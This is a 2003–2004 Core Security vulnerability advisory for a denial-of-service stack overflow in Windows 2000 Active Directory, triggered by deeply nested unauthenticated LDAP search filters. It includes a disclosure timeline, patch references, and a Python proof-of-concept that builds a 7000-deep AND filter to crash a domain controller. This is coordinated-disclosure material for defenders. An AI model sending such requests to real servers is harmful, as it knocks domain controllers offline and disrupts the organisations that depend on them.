Active Directory Stack Overflow

Active Directory Stack Overflow

Core Security Technologies Advisory
http://www.coresecurity.com

Date Published: 2003-07-02

Last Update: 2004-04-21

Advisory ID: CORE-2003-0305-03

Bugtraq ID: 7930

CVE Name: CAN-2003-0663

Title: Active Directory Stack Overflow

Class: Boundary Error Condition, Denial of Service

Remotely Exploitable: Yes

Locally Exploitable: Yes

Advisory URL: ">

Vendors contacted:
- Microsoft
. 2003-05-16 CORE notification to Microsoft
. 2003-05-19 Notification acknowledged by Microsoft
. 2003-05-19 Microsoft notifies CORE that the issue will be fixed in SP4
. 2003-06-26 Release of Windows 2000 Service Pack 4
. 2003-07-02 CORE-2003-0305-03 v1.6 advisory published.
. 2003-08-11 CORE researcher re-discovers the vulnerability in SP4
. 2003-08-11 CORE notifies Microsoft that the vulnerability was not fixed
. 2003-08-11 Notification acknowledged by Microsoft
. 2004-04-13 Microsoft releases Microsoft Security Bulletin MS04-011

Release Mode: COORDINATED RELEASE

*Vulnerability Description:*

Active Directory, which is an essential component of the Windows 2000 architecture, presents organizations with a directory service designed for distributed computing environments. Active Directory allows organizations to centrally manage and share information on network resources and users while acting as the central authority for network security.

The directory services provided by Active Directory are based on the Lightweight Directory Access Protocol (LDAP) and thus Active Directory objects can be stored and retrieved using the LDAP protocol.

A vulnerability in Active Directory allows an attacker to crash and force a reboot of any Windows 2000 Server running the Active Directory service.

The vulnerability can be triggered when an LDAP version 3 search request with more than 1000 "AND" statements is sent to the server, resulting in a stack overflow and subsequent crash of the Lsaas.exe service.

This in turn, will force a domain controller to stop responding, thus making possible a denial of service attack against it. The LDAP request does not need to be authenticated.

The possibility of exploiting this vulnerability to execute arbitrary code on a vulnerable server has not been proved but is not discarded.

*Vulnerable Packages:*

All Windows 2000 Server versions with Active Directory (up to and including SP4)

*Solution/Vendor Information/Workaround:*

A similar Active Directory vulnerability is described in: http://support.microsoft.com/default.aspx?kbid=319709

The Microsoft Security Bulletin MS04-011 update fixes this vulnerability: http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx

*Credits:*

This vulnerability was found by Eduardo Arias, Gabriel Becedillas, Ricardo Quesada and Damian Saura from Core Security Technologies during Bugweek 2003 (March 3-7, 2003).

*Technical Description - Exploit/Concept Code:*

A 'search request' created using LDAP version 3, constructed with more than 1000 "AND"s, will provoke a stack overflow, making the Lsass.exe service crash and rebooting the machine within 30 seconds.

To reproduce the stack overflow, you need to create a 'search request' to an Active Directory server. The 'search request' must search for a non existent machine within the Domain Controller that you've previously bind to.

It must be composed with more than 1000 AND statements but it is supposed that OR, GE, LE and other binary operators will yield the same results.

This query is very "deep" whereas the vulnerability fixed in Service Pack 4 is for very "wide" queries. More precisely, the "wide" filter looks like:

1. (|(foo=bar)(foo=bar2)(foo=bar3)...)

whereas the "deep" filter looks like:

2. (|(|(|(foo=bar))(foo=bar2))(foo=bar3))

While the Service Pack 4 prevents exploitation with a filter like (1) it does not prevent a filter like (2) from crashing the Server running Active Directory

Example of a Python script that creates such a request:

------------------------------------
class ActiveDirectoryDOS( Ldap ):

def __init__(self):
self._s = None
self.host = '192.168.0.1'
self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com'
self.port = 389
self.buffer = ''
self.msg_id = 1
Ldap.__init__()

def generateFilter_BinaryOp( self, filter ):
filterBuffer = asn1.OCTETSTRING(filter[1]).encode() + asn1.OCTETSTRING(filter[2]).encode()
filterBuffer = self.encapsulateHeader( filter[0], filterBuffer )
return filterBuffer

def generateFilter_RecursiveBinaryOp( self, filter, numTimes):
simpleBinOp = self.generateFilter_BinaryOp( filter )
filterBuffer = simpleBinOp
for cnt in range( 0, numTimes ):
filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND, filterBuffer + simpleBinOp )
return filterBuffer

def searchSub( self, filterBuffer ):

self.bindRequest()
self.searchRequest( filterBuffer )

def run(self, host = '', basedn = '', name = '' ):

# the machine must not exist
machine_name = 'xaxax'

filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUALITY,'name',machine_name)

# execute the anonymous query
print 'executing query'
filterBuffer = self.generateFilter_RecursiveBinaryOp( filterComputerNotInDir, 7000 )
self.searchSub( filterBuffer )

------------------------------------

*About Core Security Technologies*

Core Security Technologies develops strategic security solutions for Fortune 1000 corporations, government agencies and military organizations. The company offers information security software and services designed to assess risk and protect and manage information assets.
Headquartered in Boston, MA, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com.

To learn more about CORE IMPACT, the first comprehensive penetration testing framework, visit: http://www.coresecurity.com/products/coreimpact

*DISCLAIMER:*

The contents of this advisory are copyright (c) 2004 CORE Security Technologies and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.

$Id: ActiveDirectory-advisory2.txt,v 1.9 2004/04/21 20:49:45 aag Exp $